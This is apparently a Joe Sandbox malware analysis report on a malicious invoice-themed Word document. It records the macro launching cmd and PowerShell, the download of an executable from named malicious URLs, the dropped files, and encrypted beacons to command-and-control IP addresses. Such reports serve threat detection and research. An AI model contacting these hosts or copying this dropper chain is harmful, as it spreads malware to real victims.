Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:22.0.0
Analysis ID:62468
Start time:12:29:28
Joe Sandbox Product:CloudBasic
Start date:04.06.2018
Overall analysis duration:0h 9m 14s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:INVOICE-ZZIF-145448203429222.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Run name:without instrumentation
Number of analysed new started processes analysed:10
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.evad.expl.troj.winDOC@13/8@2/6
HCA Information:
  • Successful, ratio: 96%
  • Number of executed functions: 78
  • Number of non-executed functions: 149
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 26% (good quality ratio 19.2%)
  • Quality average: 50.8%
  • Quality standard deviation: 38.6%
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Number of clicks 934
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): conhost.exe, dllhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe

Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample HTTP request are all non existing, likely the sample is no longer working
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\Users\Public\276299.exeAvira: Label: TR/Crypt.Xpack.fgsar
Multi AV Scanner detection for domain / URLShow sources
Source: executivevacation.usvirustotal: Detection: 7%Perma Link
Source: http://149.62.173.247:4143/virustotal: Detection: 8%Perma Link
Source: http://executivevacation.us/BeBk/virustotal: Detection: 22%Perma Link
Source: https://61.19.254.63:443/virustotal: Detection: 7%Perma Link
Source: http://149.202.153.252:4143/virustotal: Detection: 8%Perma Link
Source: http://178.32.255.132:8080/virustotal: Detection: 7%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\Public\276299.exevirustotal: Detection: 82%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: INVOICE-ZZIF-145448203429222.docvirustotal: Detection: 49%Perma Link
Antivirus detection for unpacked fileShow sources
Source: 8.2.PartitionClu.exe.3e0000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 7.1.276299.exe.400000.0.unpackAvira: Label: HEUR/AGEN.1018119
Source: 6.2.276299.exe.400000.1.unpackAvira: Label: HEUR/AGEN.1018119
Source: 7.2.276299.exe.3e0000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 9.0.PartitionClu.exe.400000.1.unpackAvira: Label: TR/Crypt.Xpack.fgsar
Source: 8.2.PartitionClu.exe.400000.2.unpackAvira: Label: HEUR/AGEN.1018119
Source: 6.0.276299.exe.400000.3.unpackAvira: Label: TR/Crypt.Xpack.fgsar
Source: 9.0.PartitionClu.exe.400000.0.unpackAvira: Label: TR/Crypt.Xpack.fgsar
Source: 8.2.PartitionClu.exe.3d0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 9.2.PartitionClu.exe.3d0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 7.2.276299.exe.3d0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 9.0.PartitionClu.exe.400000.3.unpackAvira: Label: TR/Crypt.Xpack.fgsar
Source: 8.1.PartitionClu.exe.400000.0.unpackAvira: Label: HEUR/AGEN.1018119
Source: 7.0.276299.exe.400000.1.unpackAvira: Label: TR/Crypt.Xpack.fgsar
Source: 7.0.276299.exe.400000.0.unpackAvira: Label: TR/Crypt.Xpack.fgsar
Source: 6.2.276299.exe.420000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 7.0.276299.exe.400000.3.unpackAvira: Label: TR/Crypt.Xpack.fgsar
Source: 6.0.276299.exe.400000.2.unpackAvira: Label: TR/Crypt.Xpack.fgsar
Source: 8.0.PartitionClu.exe.400000.0.unpackAvira: Label: TR/Crypt.Xpack.fgsar
Source: 9.2.PartitionClu.exe.3e0000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 7.0.276299.exe.400000.2.unpackAvira: Label: TR/Crypt.Xpack.fgsar
Source: 6.0.276299.exe.400000.1.unpackAvira: Label: TR/Crypt.Xpack.fgsar
Source: 9.1.PartitionClu.exe.400000.0.unpackAvira: Label: HEUR/AGEN.1018119
Source: 6.2.276299.exe.2d0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 6.0.276299.exe.400000.0.unpackAvira: Label: TR/Crypt.Xpack.fgsar
Source: 9.2.PartitionClu.exe.400000.2.unpackAvira: Label: HEUR/AGEN.1018119
Source: 9.0.PartitionClu.exe.400000.2.unpackAvira: Label: TR/Crypt.Xpack.fgsar
Source: 4.1.powershell.exe.51b0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 7.2.276299.exe.400000.2.unpackAvira: Label: HEUR/AGEN.1018119
Source: 6.1.276299.exe.400000.0.unpackAvira: Label: HEUR/AGEN.1018119

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Users\Public\276299.exeCode function: 7_2_003E246E CryptGenKey,CryptDestroyKey,CryptReleaseContext,7_2_003E246E
Source: C:\Users\Public\276299.exeCode function: 7_2_003E25C5 CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree,7_2_003E25C5
Source: C:\Users\Public\276299.exeCode function: 7_2_003E2417 CryptDecodeObjectEx,CryptReleaseContext,7_2_003E2417
Source: C:\Users\Public\276299.exeCode function: 7_2_003E2507 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptDestroyHash,GetProcessHeap,HeapFree,7_2_003E2507
Source: C:\Users\Public\276299.exeCode function: 7_2_003E265B RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree,7_2_003E265B
Source: C:\Users\Public\276299.exeCode function: 7_2_003E23E0 memset,CryptAcquireContextW,7_2_003E23E0
Source: C:\Users\Public\276299.exeCode function: 7_2_003E248C CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_003E248C
Source: C:\Users\Public\276299.exeCode function: 7_2_003E2447 CryptImportKey,LocalFree,CryptReleaseContext,7_2_003E2447
Source: C:\Users\Public\276299.exeCode function: 7_2_003E2588 CryptExportKey,CryptDestroyHash,GetProcessHeap,HeapFree,7_2_003E2588
Source: C:\Windows\System32\PartitionClu.exeCode function: 9_2_003E2417 CryptDecodeObjectEx,CryptReleaseContext,9_2_003E2417
Source: C:\Windows\System32\PartitionClu.exeCode function: 9_2_003E9200 _snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,CreateMutexW,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,9_2_003E9200
Source: C:\Windows\System32\PartitionClu.exeCode function: 9_2_003E2507 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptDestroyHash,GetProcessHeap,HeapFree,9_2_003E2507
Source: C:\Windows\System32\PartitionClu.exeCode function: 9_2_003E916E memset,_snwprintf,GetProcessHeap,HeapFree,CreateMutexW,WaitForSingleObject,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,9_2_003E916E
Source: C:\Windows\System32\PartitionClu.exeCode function: 9_2_003E23E0 memset,CryptAcquireContextW,9_2_003E23E0
Source: C:\Windows\System32\PartitionClu.exeCode function: 9_2_003E246E CryptGenKey,CryptDestroyKey,CryptReleaseContext,9_2_003E246E
Source: C:\Windows\System32\PartitionClu.exeCode function: 9_2_003E25C5 CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree,9_2_003E25C5
Source: C:\Windows\System32\PartitionClu.exeCode function: 9_2_003E265B RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree,9_2_003E265B
Source: C:\Windows\System32\PartitionClu.exeCode function: 9_2_003E92A0 CreateEventW,SignalObjectAndWait,ResetEvent,ReleaseMutex,CloseHandle,GetTickCount,CreateTimerQueueTimer,WaitForSingleObject,DeleteTimerQueueTimer,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,9_2_003E92A0
Source: C:\Windows\System32\PartitionClu.exeCode function: 9_2_003E248C CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,9_2_003E248C
Source: C:\Windows\System32\PartitionClu.exeCode function: 9_2_003E2447 CryptImportKey,LocalFree,CryptReleaseContext,9_2_003E2447
Source: C:\Windows\System32\PartitionClu.exeCode function: 9_2_003E2588 CryptExportKey,CryptDestroyHash,GetProcessHeap,HeapFree,9_2_003E2588

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Users\Public\276299.exeCode function: 7_2_003E2447 CryptImportKey,LocalFree,CryptReleaseContext,7_2_003E2447
Source: C:\Windows\System32\PartitionClu.exeCode function: 9_2_003E2447 CryptImportKey,LocalFree,CryptReleaseContext,9_2_003E2447

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exeJump to behavior
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: clients.steadfast.digital
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.2.3:49173 -> 190.13.146.47:443
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.2.3:49171 -> 66.198.240.37:80

Networking:

barindex
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.2.3:49172 -> 149.202.153.252:4143
Source: global trafficTCP traffic: 192.168.2.3:49174 -> 178.32.255.132:8080
Source: global trafficTCP traffic: 192.168.2.3:49175 -> 149.62.173.247:4143
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 4143
Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 4143
Downloads executable code via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 04 Jun 2018 10:30:13 GMTServer: ApacheX-Powered-By: PHP/7.0.30Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheContent-Disposition: attachment; filename="6044.exe"Content-Transfer-Encoding: binaryContent-Length: 110080Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 00 00 00 21 64 65 72 6e 33 32 0d 75 6e 00 b4 09 cd 21 b8 01 4c cd 37 ba 10 00 67 21 90 20 62 54 68 72 4c cd 20 75 6e 20 0e 1f ba 0e 65 21 b8 0a 24 4d 5a 90 00 03 00 00 00 72 b4 09 cd 69 01 0e 61 6d 20 6d 75 73 74 90 54 68 69 73 20 70 72 6f 20 57 1f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 03 11 0b 01 00 02 eb cb e1 0b 00 e0 00 00 01 00 00 00 b0 16 00 00 00 10 00 00 00 40 00 00 00 00 40 00 00 10
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /BeBk/ HTTP/1.1Host: executivevacation.usConnection: Keep-Alive
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 190.13.146.47 190.13.146.47
Source: Joe Sandbox ViewIP Address: 149.62.173.247 149.62.173.247
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: INFORTELECOM-ASES INFORTELECOM-ASES
Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 149.202.153.252:4143Content-Length: 324Connection: Keep-AliveCache-Control: no-cacheData Raw: a2 01 c6 80 d9 b1 cc 22 af 21 3b b4 63 26 35 76 4b cf 38 4e ec f6 40 4f 2e bd 62 5f d4 38 38 f8 0a d3 f5 c8 03 b4 64 a5 db c5 55 5e 3d ad b9 d5 9f 4a 67 05 c6 59 2f 37 75 d0 c5 7b 29 4a e1 28 8d 4b 35 84 9a 52 90 f8 4f b2 4d 4f 11 43 40 f1 9d 21 80 d3 7b 55 28 1f 08 06 3f 72 ca fb 85 65 c4 55 72 e5 e7 5d 66 49 8d e3 e2 c4 77 a5 84 53 e1 1b 8e fc 8b 81 78 77 8b c7 a6 b5 9b 78 3d aa 14 4f 17 02 57 6d 21 16 77 67 b3 ec 5c f2 e4 09 62 ea 87 8e cc 97 67 a7 1f da 6c 0f 9d 50 a2 90 61 d4 7f ca 7f a2 bd 75 7e 7a e6 76 d9 dd 6f 6f 3b 10 20 02 43 ff c8 60 de d3 e4 04 48 4d 74 96 bf 4a 80 15 71 94 d5 76 e8 22 2c 5e 6c e1 d7 e3 b1 0d 33 cf 33 5f 4f 99 c3 a6 f8 04 6f c5 3b e1 06 6c 39 81 bd a5 bc 6e 04 7e 7b 5b 83 b6 5
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.13.146.47:443Content-Length: 324Connection: Keep-AliveCache-Control: no-cacheData Raw: a0 8a bd 5e 7f d9 9f ba 51 22 cd e8 13 6b 55 ff d7 2e 81 85 6e 49 a0 59 bd f7 c3 d4 80 30 a6 af 67 be 1b 36 a8 70 7e 19 c8 64 58 5f 19 c9 47 a2 69 1b 4b 8f 05 2a 22 a6 eb ec a1 9e e8 9b 6a 64 eb 18 11 79 01 b8 e6 a4 d6 14 7f 40 ae 94 d5 15 e7 af a2 1b 4b c9 e6 02 da d6 9a a6 82 29 90 c0 c4 55 72 e5 e7 5d 66 49 8d e3 e2 c4 77 a5 84 53 e1 1b 8e fc 8b 81 78 77 8b c7 a6 b5 9b 78 3d aa 14 4f 17 02 57 6d 21 16 77 67 b3 ec 5c f2 e4 09 62 ea 87 8e cc 97 67 a7 1f da 6c 0f 9d 50 a2 90 61 d4 7f ca 7f a2 bd 75 7e 7a e6 76 d9 dd 6f 6f 3b 10 20 02 43 ff c8 60 de d3 e4 04 48 4d 74 96 bf 4a 80 15 71 94 d5 76 e8 22 2c 5e 6c e1 d7 e3 b1 0d 33 cf 33 5f 4f 99 c3 a6 f8 04 6f c5 3b e1 06 6c 39 81 bd a5 bc 6e 04 7e 7b 5b 83 b6 5d f
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 178.32.255.132:8080Content-Length: 308Connection: Keep-AliveCache-Control: no-cacheData Raw: 34 a5 28 f9 03 d9 dc f9 02 dc d3 1c c2 4b e2 db 1e 8d c4 0f 0e b7 d1 0a 94 c2 9d 70 5d 54 e7 1b 07 c1 7a 29 4b b9 82 52 65 fd 86 b2 21 5d 10 13 60 88 ac 8c 0e 5d ae 37 fc fb c0 55 b5 8c 47 83 36 a3 cb 52 92 c6 6c 91 51 cd e7 d0 a1 99 24 d5 12 f0 9b d0 ec f3 4a 2f 30 d9 de 4a a6 b9 34 be 72 d6 e0 74 bc 03 60 3b 93 36 65 37 36 3e e8 46 d8 71 4a a6 85 5b ad 64 8a 17 9b eb e9 68 ba 7f 8f 0e 12 f9 95 9f 99 34 1a 18 9b df b5 46 6a f2 26 ac 20 8a 14 29 e0 d6 18 34 f6 2c 90 9c 49 25 f2 6e 20 bb 9b 6f fd b7 2f 3d 10 a9 42 e9 8b 9c e6 53 76 73 aa 4c 2d a3 50 cf 37 1d 54 af 30 fa 7a 02 73 4a 28 52 d3 56 87 79 8b e9 39 ab a0 26 eb af e8 34 01 99 24 71 1e 0a 03 0b b7 9b bf e9 b8 c7 85 31 07 4e 22 10 7f 40 77 2e 3e 08 06
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 149.62.173.247:4143Content-Length: 308Connection: Keep-AliveCache-Control: no-cacheData Raw: 64 6a b9 60 91 a0 a6 9a a4 0d 05 54 43 65 9c f9 28 50 5d 64 3b 91 fe c7 57 f8 64 c8 5c 64 a4 8a 4b 40 63 58 b1 b5 85 81 e7 c3 da 2a 67 9f ac 1e 48 8c 70 fe b3 b7 d2 52 bc e4 49 28 54 7e d9 8f 7d 13 3c 96 51 d6 e8 2d 24 e3 d2 24 1d 38 eb f0 bc 6e 7c b5 ac 93 5f ae a7 7f 79 96 49 63 eb 3f 72 d6 e0 74 bc 03 60 3b 93 36 65 37 36 3e e8 46 d8 71 4a a6 85 5b ad 64 8a 17 9b eb e9 68 ba 7f 8f 0e 12 f9 95 9f 99 34 1a 18 9b df b5 46 6a f2 26 ac 20 8a 14 29 e0 d6 18 34 f6 2c 90 9c 49 25 f2 6e 20 bb 9b 6f fd b7 2f 3d 10 a9 42 e9 8b 9c e6 53 76 73 aa 4c 2d a3 50 cf 37 1d 54 af 30 fa 7a 02 73 4a 28 52 d3 56 87 79 8b e9 39 ab a0 26 eb af e8 34 01 99 24 71 1e 0a 03 0b b7 9b bf e9 b8 c7 85 31 07 4e 22 10 7f 40 77 2e 3e 08 06
Source: global trafficHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 61.19.254.63:443Content-Length: 308Connection: Keep-AliveCache-Control: no-cacheData Raw: 02 db d9 97 04 c8 4e 4a 50 8f ff eb 79 36 53 dd ab 65 d2 40 64 93 6b a6 ef a3 6f 42 35 98 c6 19 32 aa 74 2b 2c 94 f0 44 26 62 d5 68 92 ea c6 38 c4 85 e5 d5 aa 0c 4e 2f 28 0b cd 12 fc b5 14 e9 4a f7 16 b0 36 45 b4 07 7e 73 b6 73 ea 15 9c ea 4f 54 05 37 f1 66 60 2e d8 6a 20 a3 56 40 54 b8 72 d6 e0 74 bc 03 60 3b 93 36 65 37 36 3e e8 46 d8 71 4a a6 85 5b ad 64 8a 17 9b eb e9 68 ba 7f 8f 0e 12 f9 95 9f 99 34 1a 18 9b df b5 46 6a f2 26 ac 20 8a 14 29 e0 d6 18 34 f6 2c 90 9c 49 25 f2 6e 20 bb 9b 6f fd b7 2f 3d 10 a9 42 e9 8b 9c e6 53 76 73 aa 4c 2d a3 50 cf 37 1d 54 af 30 fa 7a 02 73 4a 28 52 d3 56 87 79 8b e9 39 ab a0 26 eb af e8 34 01 99 24 71 1e 0a 03 0b b7 9b bf e9 b8 c7 85 31 07 4e 22 10 7f 40 77 2e 3e 08 06 3b
Contains functionality to download additional files from the internetShow sources
Source: C:\Users\Public\276299.exeCode function: 7_2_003E1F79 GetProcessHeap,RtlAllocateHeap,InternetReadFile,InternetReadFile,GetProcessHeap,HeapFree,7_2_003E1F79
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.WordJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /BeBk/ HTTP/1.1Host: executivevacation.usConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: clients.steadfast.digital
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 149.202.153.252:4143Content-Length: 324Connection: Keep-AliveCache-Control: no-cacheData Raw: a2 01 c6 80 d9 b1 cc 22 af 21 3b b4 63 26 35 76 4b cf 38 4e ec f6 40 4f 2e bd 62 5f d4 38 38 f8 0a d3 f5 c8 03 b4 64 a5 db c5 55 5e 3d ad b9 d5 9f 4a 67 05 c6 59 2f 37 75 d0 c5 7b 29 4a e1 28 8d 4b 35 84 9a 52 90 f8 4f b2 4d 4f 11 43 40 f1 9d 21 80 d3 7b 55 28 1f 08 06 3f 72 ca fb 85 65 c4 55 72 e5 e7 5d 66 49 8d e3 e2 c4 77 a5 84 53 e1 1b 8e fc 8b 81 78 77 8b c7 a6 b5 9b 78 3d aa 14 4f 17 02 57 6d 21 16 77 67 b3 ec 5c f2 e4 09 62 ea 87 8e cc 97 67 a7 1f da 6c 0f 9d 50 a2 90 61 d4 7f ca 7f a2 bd 75 7e 7a e6 76 d9 dd 6f 6f 3b 10 20 02 43 ff c8 60 de d3 e4 04 48 4d 74 96 bf 4a 80 15 71 94 d5 76 e8 22 2c 5e 6c e1 d7 e3 b1 0d 33 cf 33 5f 4f 99 c3 a6 f8 04 6f c5 3b e1 06 6c 39 81 bd a5 bc 6e 04 7e 7b 5b 83 b6 5
Tries to download non-existing http data (HTTP/1.1 404 Not Found)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 04 Jun 2018 10:30:55 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65
Urls found in memory or binary dataShow sources
Source: WINWORD.EXE, 00000001.00000002.24914161033.02ECD000.00000004.sdmpString found in binary or memory: Ftp://ns.ado
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmpString found in binary or memory: file://
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmpString found in binary or memory: file:///
Source: WINWORD.EXE, 00000001.00000002.24914499487.03120000.00000004.sdmpString found in binary or memory: file:///C:
Source: powershell.exe, 00000004.00000002.24444269014.045AF000.00000004.sdmpString found in binary or memory: file:///C:/Users/Public/276299.exe
Source: WINWORD.EXE, 00000001.00000002.24907899400.003E4000.00000004.sdmpString found in binary or memory: file:///C:/Users/Sam%20Tarwell/Desktop/INVOICE-ZZIF-145448203429222.doc
Source: WINWORD.EXE, 00000001.00000002.24907899400.003E4000.00000004.sdmpString found in binary or memory: file:///C:/Users/Sam%20Tarwell/Desktop/INVOICE-ZZIF-145448203429222.docF
Source: WINWORD.EXE, 00000001.00000002.24907899400.003E4000.00000004.sdmpString found in binary or memory: file:///C:/Users/Sam%20Tarwell/Desktop/INVOICE-ZZIF-145448203429222.docT
Source: powershell.exe, 00000004.00000002.24428455719.0009B000.00000004.sdmpString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/
Source: WINWORD.EXE, 00000001.00000003.24901586225.00434000.00000004.sdmpString found in binary or memory: file:///C:/Windows/System32/cmd.exe
Source: powershell.exe, 00000004.00000002.24439490672.01E53000.00000004.sdmpString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Diagnostics/1.0.0.0__31bf3856ad36
Source: powershell.exe, 00000004.00000002.24439490672.01E53000.00000004.sdmpString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Management/1.0.0.0__31bf3856ad364
Source: powershell.exe, 00000004.00000002.24439490672.01E53000.00000004.sdmpString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Utility/1.0.0.0__31bf3856ad364e35
Source: powershell.exe, 00000004.00000002.24439490672.01E53000.00000004.sdmpString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.ConsoleHost/1.0.0.0__31bf3856ad364e35/Micr
Source: powershell.exe, 00000004.00000002.24439490672.01E53000.00000004.sdmpString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Security/1.0.0.0__31bf3856ad364e35/Microso
Source: powershell.exe, 00000004.00000002.24439490672.01E53000.00000004.sdmpString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.WSMan.Management/1.0.0.0__31bf3856ad364e35/Microsoft.
Source: powershell.exe, 00000004.00000002.24439490672.01E53000.00000004.sdmpString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35/System.M
Source: OSPPSVC.EXE, 00000005.00000002.24906958649.0033B000.00000004.sdmpString found in binary or memory: http://
Source: PartitionClu.exe, 00000009.00000002.24910325293.002C4000.00000004.sdmpString found in binary or memory: http://61.19.254.63:443/
Source: PartitionClu.exe, 00000009.00000002.24910325293.002C4000.00000004.sdmpString found in binary or memory: http://61.19.254.63:443/)
Source: PartitionClu.exe, 00000009.00000002.24910325293.002C4000.00000004.sdmpString found in binary or memory: http://61.19.254.63:443/=
Source: WINWORD.EXE, 00000001.00000002.24914161033.02ECD000.00000004.sdmpString found in binary or memory: http://V
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmpString found in binary or memory: http://clients
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmpString found in binary or memory: http://clients.steadfast.digit
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmpString found in binary or memory: http://clients.steadfast.digital
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmp, powershell.exe, 00000004.00000002.24428455719.0009B000.00000004.sdmpString found in binary or memory: http://clients.steadfast.digital/BIDORSF/
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmpString found in binary or memory: http://clients.steadfast.digital/BIDORSF/8
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmpString found in binary or memory: http://clients.steadfast.digitalx&
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmpString found in binary or memory: http://clientsX
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmpString found in binary or memory: http://executivevaca
Source: powershell.exe, 00000004.00000002.24441979155.022F9000.00000004.sdmpString found in binary or memory: http://executivevacation.us
Source: powershell.exe, 00000004.00000002.24441793371.021FF000.00000004.sdmpString found in binary or memory: http://executivevacation.us/BeBk/
Source: powershell.exe, 00000004.00000002.24441979155.022F9000.00000004.sdmpString found in binary or memory: http://executivevacation.usx&
